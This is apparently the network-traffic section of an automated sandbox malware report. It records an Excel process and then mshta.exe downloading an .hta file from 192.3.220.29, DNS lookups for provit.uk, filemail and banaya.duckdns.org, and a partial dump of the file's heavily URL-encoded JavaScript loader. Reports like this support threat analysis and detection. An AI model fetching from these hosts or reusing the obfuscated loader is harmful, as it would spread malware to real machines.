                                                                                                            Nov 20, 2024 16:58:30.666707993 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.667370081 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.667574883 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.667614937 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.668442965 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.668456078 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.668490887 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.669451952 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.669605970 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.669650078 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.670475960 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.670488119 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.670517921 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.671506882 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.671520948 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.671561956 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.672688961 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.672826052 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.672875881 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.673538923 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.673702955 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.673759937 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.673818111 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.673830986 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.673865080 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.673912048 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.673923016 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.673937082 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.673949957 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.673958063 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.673981905 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.674295902 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.674484968 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.674525023 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.675297022 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.675419092 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.675481081 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.676413059 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.676489115 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.676559925 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.677369118 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.677426100 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.677498102 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.678412914 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.678486109 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.678558111 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.679371119 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.679601908 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.679676056 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.680428028 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.680521965 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.680591106 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.681396961 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.681484938 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.681555033 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.682403088 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.682527065 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.682595968 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.688515902 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.688642979 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.688674927 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.688707113 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.688719034 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.688745022 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.688781977 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.688797951 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.688858986 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.689918041 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.689950943 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.690018892 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.690634012 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.690793991 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.690855026 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.691720963 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.691867113 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.691940069 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.692828894 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.692874908 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.692950010 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.833997965 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:46.053848982 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:58:46.058504105 CET491766946192.168.2.22192.3.101.149
                                                                                                            Nov 20, 2024 16:58:46.178299904 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:59:16.052228928 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:59:16.053899050 CET491766946192.168.2.22192.3.101.149
                                                                                                            Nov 20, 2024 16:59:16.180634022 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:59:28.613754034 CET4917780192.168.2.22178.237.33.50
                                                                                                            Nov 20, 2024 16:59:29.175290108 CET4917780192.168.2.22178.237.33.50
                                                                                                            Nov 20, 2024 16:59:29.877151966 CET4917780192.168.2.22178.237.33.50
                                                                                                            Nov 20, 2024 16:59:31.078346014 CET4917780192.168.2.22178.237.33.50
                                                                                                            Nov 20, 2024 16:59:33.574376106 CET4917780192.168.2.22178.237.33.50

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 20, 2024 16:57:16.955137968 CET5456253192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:57:17.195640087 CET53545628.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:57:22.103718996 CET5291753192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:57:22.248327971 CET53529178.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:57:22.249465942 CET5291753192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:57:22.489525080 CET53529178.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:57:22.489837885 CET5291753192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:57:22.626312017 CET53529178.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:57:45.705996990 CET6275153192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:57:45.963499069 CET53627518.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:57:45.970781088 CET5789353192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:57:46.230933905 CET53578938.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.816102028 CET5482153192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:57:51.174544096 CET53548218.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.179064035 CET5482153192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:57:51.535621881 CET53548218.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.536180973 CET5482153192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:57:51.672034979 CET53548218.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:58:08.688010931 CET5471953192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:58:08.823702097 CET53547198.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:58:08.829360962 CET4988153192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:58:08.964095116 CET53498818.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.354443073 CET5499853192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:58:13.694565058 CET53549988.8.8.8192.168.2.22
                                                                                                            Nov 20, 2024 16:58:17.304562092 CET5278153192.168.2.228.8.8.8
                                                                                                            Nov 20, 2024 16:58:17.543587923 CET53527818.8.8.8192.168.2.22

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 20, 2024 16:57:16.955137968 CET192.168.2.228.8.8.80x5992Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:22.103718996 CET192.168.2.228.8.8.80x5490Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:22.249465942 CET192.168.2.228.8.8.80x5490Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:22.489837885 CET192.168.2.228.8.8.80x5490Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:45.705996990 CET192.168.2.228.8.8.80x766Standard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:45.970781088 CET192.168.2.228.8.8.80xebfcStandard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:50.816102028 CET192.168.2.228.8.8.80x8e21Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:51.179064035 CET192.168.2.228.8.8.80x8e21Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:51.536180973 CET192.168.2.228.8.8.80x8e21Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:58:08.688010931 CET192.168.2.228.8.8.80xa309Standard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:58:08.829360962 CET192.168.2.228.8.8.80x9360Standard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:58:13.354443073 CET192.168.2.228.8.8.80xf720Standard query (0)banaya.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:58:17.304562092 CET192.168.2.228.8.8.80xa8c8Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 20, 2024 16:57:17.195640087 CET8.8.8.8192.168.2.220x5992No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:22.248327971 CET8.8.8.8192.168.2.220x5490No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:22.489525080 CET8.8.8.8192.168.2.220x5490No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:22.626312017 CET8.8.8.8192.168.2.220x5490No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:45.963499069 CET8.8.8.8192.168.2.220x766No error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:45.963499069 CET8.8.8.8192.168.2.220x766No error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:46.230933905 CET8.8.8.8192.168.2.220xebfcNo error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:46.230933905 CET8.8.8.8192.168.2.220xebfcNo error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:51.174544096 CET8.8.8.8192.168.2.220x8e21No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:51.535621881 CET8.8.8.8192.168.2.220x8e21No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:57:51.672034979 CET8.8.8.8192.168.2.220x8e21No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:58:08.823702097 CET8.8.8.8192.168.2.220xa309No error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:58:08.823702097 CET8.8.8.8192.168.2.220xa309No error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:58:08.964095116 CET8.8.8.8192.168.2.220x9360No error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:58:08.964095116 CET8.8.8.8192.168.2.220x9360No error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:58:13.694565058 CET8.8.8.8192.168.2.220xf720No error (0)banaya.duckdns.org192.3.101.149A (IP address)IN (0x0001)false
                                                                                                            Nov 20, 2024 16:58:17.543587923 CET8.8.8.8192.168.2.220xa8c8No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • provit.uk
                                                                                                            • 1017.filemail.com
                                                                                                            • 192.3.220.29
                                                                                                            • geoplugin.net

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.2249164192.3.220.29803552C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 16:57:19.223304987 CET373OUTGET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: 192.3.220.29
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 16:57:20.441879988 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 15:57:19 GMT
                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                            Last-Modified: Wed, 20 Nov 2024 07:47:08 GMT
                                                                                                            ETag: "5a0de-627535b5bef4e"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 368862
                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/hta
                                                                                                            Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 32 30 63 6f 64 65 25 32 30 62 79 25 32 30 68 74 74 70 73 25 33 41 2f 2f 77 77 77 2e 68 74 6d 6c 2d 63 6f 64 65 2d 67 65 6e 65 72 61 74 6f 72 2e 63 6f 6d 25 32 30 2d 2d 25 33 45 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 37 25 32 35 33 43 25 32 35 37 33 25 32 35 36 33 25 32 35 37 32 25 32 35 36 39 25 32 35 37 30 25 32 35 37 34 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 25 32 35 32 44 25 32 35 32 44 25 32 35 32 30 25 32 35 36 33 25 32 35 36 46 25 32 35 36 34 25 32 35 36 35 25 32 35 32 30 25 32 35 36 32 25 32 35 37 39 25 32 35 32 30 25 32 35 36 38 25 32 35 37 34 25 32 35 37 34 25 32 35 37 30 25 32 35 37 33 25 32 35 33 41 25 32 35 32 46 25 32 35 32 46 25 32 35 37 37 25 32 35 37 37 25 32 35 37 37 25 32 35 32 45 25 32 35 36 38 25 32 35 37 34 25 32 35 36 44 25 32 35 36 43 [TRUNCATED]
                                                                                                            Data Ascii: <script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%20code%20by%20https%3A//www.html-code-generator.com%20--%3E%0Adocument.write%28unescape%28%27%253C%2573%2563%2572%2569%2570%2574%253E%250A%253C%2521%252D%252D%2520%2563%256F%2564%2565%2520%2562%2579%2520%2568%2574%2574%2570%2573%253A%252F%252F%2577%2577%2577%252E%2568%2574%256D%256C%252D%2563%256F%2564%2565%252D%2567%2565%256E%2565%2572%2561%2574%256F%2572%252E%2563%256F%256D%2520%252D%252D%253E%250A%2564%256F%2563%2575%256D%2565%256E%2574%252E%2577%2572%2569%2574%2565%2528%2575%256E%2565%2573%2563%2561%2570%2565%2528%2527%2525%2533%2543%2525%2532%2531%2525%2534%2534%2525%2534%2546%2525%2534%2533%2525%2535%2534%2525%2535%2539%2525%2535%2530%2525%2534%2535%2525%2532%2530%2525%2536%2538%2525%2537%2534%2525%2536%2544%2525%2536%2543%2525%2533%2545%2525%2530%2541%2525%2533%2543%2525%2536%2544%2525%2536%2535%2525%2537%2534%2525%2536%2531%2525%2532%2530%25
                                                                                                            Nov 20, 2024 16:57:20.441905975 CET1236INData Raw: 32 35 25 32 35 33 36 25 32 35 33 38 25 32 35 32 35 25 32 35 33 37 25 32 35 33 34 25 32 35 32 35 25 32 35 33 37 25 32 35 33 34 25 32 35 32 35 25 32 35 33 37 25 32 35 33 30 25 32 35 32 35 25 32 35 33 32 25 32 35 34 34 25 32 35 32 35 25 32 35 33 36
                                                                                                            Data Ascii: 25%2536%2538%2525%2537%2534%2525%2537%2534%2525%2537%2530%2525%2532%2544%2525%2536%2535%2525%2537%2531%2525%2537%2535%2525%2536%2539%2525%2537%2536%2525%2533%2544%2525%2532%2532%2525%2535%2538%2525%2532%2544%2525%2535%2535%2525%2534%2531%2525%
                                                                                                            Nov 20, 2024 16:57:20.441920996 CET448INData Raw: 34 25 32 35 33 31 25 32 35 32 35 25 32 35 33 34 25 32 35 33 37 25 32 35 32 35 25 32 35 33 34 25 32 35 33 35 25 32 35 32 35 25 32 35 33 33 25 32 35 34 34 25 32 35 32 35 25 32 35 33 32 25 32 35 33 32 25 32 35 32 35 25 32 35 33 35 25 32 35 33 36 25
                                                                                                            Data Ascii: 4%2531%2525%2534%2537%2525%2534%2535%2525%2533%2544%2525%2532%2532%2525%2535%2536%2525%2534%2532%2525%2537%2533%2525%2534%2533%2525%2537%2532%2525%2536%2539%2525%2537%2530%2525%2537%2534%2525%2532%2532%2525%2533%2545%2525%2530%2541%2525%2536%2
                                                                                                            Nov 20, 2024 16:57:20.441935062 CET1236INData Raw: 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33
                                                                                                            Data Ascii: 530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530
                                                                                                            Nov 20, 2024 16:57:20.441943884 CET1236INData Raw: 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35
                                                                                                            Data Ascii: 39%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%
                                                                                                            Nov 20, 2024 16:57:20.441960096 CET1236INData Raw: 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25
                                                                                                            Data Ascii: 5%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2
                                                                                                            Nov 20, 2024 16:57:20.441976070 CET1236INData Raw: 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32
                                                                                                            Data Ascii: %2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%25
                                                                                                            Nov 20, 2024 16:57:20.441989899 CET328INData Raw: 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35
                                                                                                            Data Ascii: 2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2537%2538%2525%2534%2535%2525%2535%2538%2525%2536%2543%2525%2536%2545%2525%2535%2530%2525%2534%2541%2525%2537%2532%2525%2537%2530%2525%2534%2545%2525%2535%2531%252
                                                                                                            Nov 20, 2024 16:57:20.442006111 CET1236INData Raw: 39 25 32 35 32 35 25 32 35 33 37 25 32 35 33 36 25 32 35 32 35 25 32 35 33 37 25 32 35 33 33 25 32 35 32 35 25 32 35 33 37 25 32 35 33 34 25 32 35 32 35 25 32 35 33 34 25 32 35 33 38 25 32 35 32 35 25 32 35 33 36 25 32 35 33 36 25 32 35 32 35 25
                                                                                                            Data Ascii: 9%2525%2537%2536%2525%2537%2533%2525%2537%2534%2525%2534%2538%2525%2536%2536%2525%2537%2535%2525%2537%2530%2525%2536%2539%2525%2535%2539%2525%2535%2532%2525%2536%2533%2525%2535%2539%2525%2534%2541%2525%2534%2533%2525%2534%2536%2525%2537%2534%2
                                                                                                            Nov 20, 2024 16:57:20.442023039 CET1236INData Raw: 25 32 35 33 37 25 32 35 33 30 25 32 35 32 35 25 32 35 33 36 25 32 35 33 35 25 32 35 32 35 25 32 35 33 36 25 32 35 34 34 25 32 35 32 35 25 32 35 33 34 25 32 35 33 35 25 32 35 32 35 25 32 35 33 35 25 32 35 33 33 25 32 35 32 35 25 32 35 33 36 25 32
                                                                                                            Data Ascii: %2537%2530%2525%2536%2535%2525%2536%2544%2525%2534%2535%2525%2535%2533%2525%2536%2539%2525%2536%2534%2525%2536%2543%2525%2534%2545%2525%2536%2537%2525%2536%2539%2525%2536%2536%2525%2535%2532%2525%2536%2531%2525%2534%2536%2525%2535%2531%2525%25
                                                                                                            Nov 20, 2024 16:57:20.567470074 CET1236INData Raw: 32 35 33 34 25 32 35 32 35 25 32 35 33 35 25 32 35 33 33 25 32 35 32 35 25 32 35 33 35 25 32 35 33 38 25 32 35 32 35 25 32 35 33 36 25 32 35 33 33 25 32 35 32 35 25 32 35 33 35 25 32 35 33 30 25 32 35 32 35 25 32 35 33 35 25 32 35 33 30 25 32 35
                                                                                                            Data Ascii: 2534%2525%2535%2533%2525%2535%2538%2525%2536%2533%2525%2535%2530%2525%2535%2530%2525%2534%2543%2525%2536%2541%2525%2537%2530%2525%2535%2530%2525%2537%2538%2525%2535%2541%2525%2536%2537%2525%2535%2536%2525%2534%2535%2525%2537%2539%2525%2536%254


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.2249166192.3.220.29803844C:\Windows\System32\mshta.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 16:57:25.692431927 CET450OUTGET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Range: bytes=8896-
                                                                                                            Connection: Keep-Alive
                                                                                                            Host: 192.3.220.29
                                                                                                            If-Range: "5a0de-627535b5bef4e"
                                                                                                            Nov 20, 2024 16:57:26.890983105 CET1236INHTTP/1.1 206 Partial Content
                                                                                                            Date: Wed, 20 Nov 2024 15:57:25 GMT
                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                            Last-Modified: Wed, 20 Nov 2024 07:47:08 GMT
                                                                                                            ETag: "5a0de-627535b5bef4e"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 359966
                                                                                                            Content-Range: bytes 8896-368861/368862
                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/hta
